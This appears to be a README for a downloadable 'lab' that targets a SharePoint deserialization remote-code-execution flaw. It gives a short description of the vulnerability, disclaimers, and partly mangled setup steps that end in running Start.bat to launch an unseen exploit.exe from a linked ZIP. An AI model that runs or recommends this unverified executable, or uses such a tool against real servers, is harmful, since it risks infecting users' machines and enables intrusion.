
Educational lab demonstrating a deserialization vulnerability in Microsoft SharePoint that enables remote code execution, with a hands-on exploitation interface for authorized testing.
This lab demonstrates a deserialization vulnerability in Microsoft Office SharePoint that enables remote code execution (RCE). The issue arises from improper handling of untrusted serialized data within SharePoint's object deserialization routines, allowing an authenticated attacker execute arbitrary code on the target server. With a CVSSv3 score of 8.8, this high-severity vulnerability impacts various SharePoint versions, including Enterprise Server 2016, Server 2019, and Subscription Edition. Successful exploitation could lead to data exfiltration, privilege escalation, or full system compromise in networked environments.
This lab involves potentially harmful code execution simulations. Use only in isolated, non-production environments. Do not deploy on live systems or networks without proper authorization. The authors disclaim any liability for misuse, damages, or legal consequences arising from this repository. Always adhere to ethical hacking guidelines and obtain explicit permission before testing on any systems.
Educational Purpose Only: This repository is provided solely for learning about software vulnerabilities and secure coding practices. It is not intended to facilitate unauthorized access, attacks, or any illegal activities.
Download the lab resources as a ZIP archive from the following link: Download Lab ZIP.
To install:
C:\cve-2025-54897-lab).dotnet --version in Command Prompt.Start.bat to launch exploit.exe. This will open the exploitation interface in a console window.http://localhost:80 for local testing).For questions or contributions, email me at [email protected]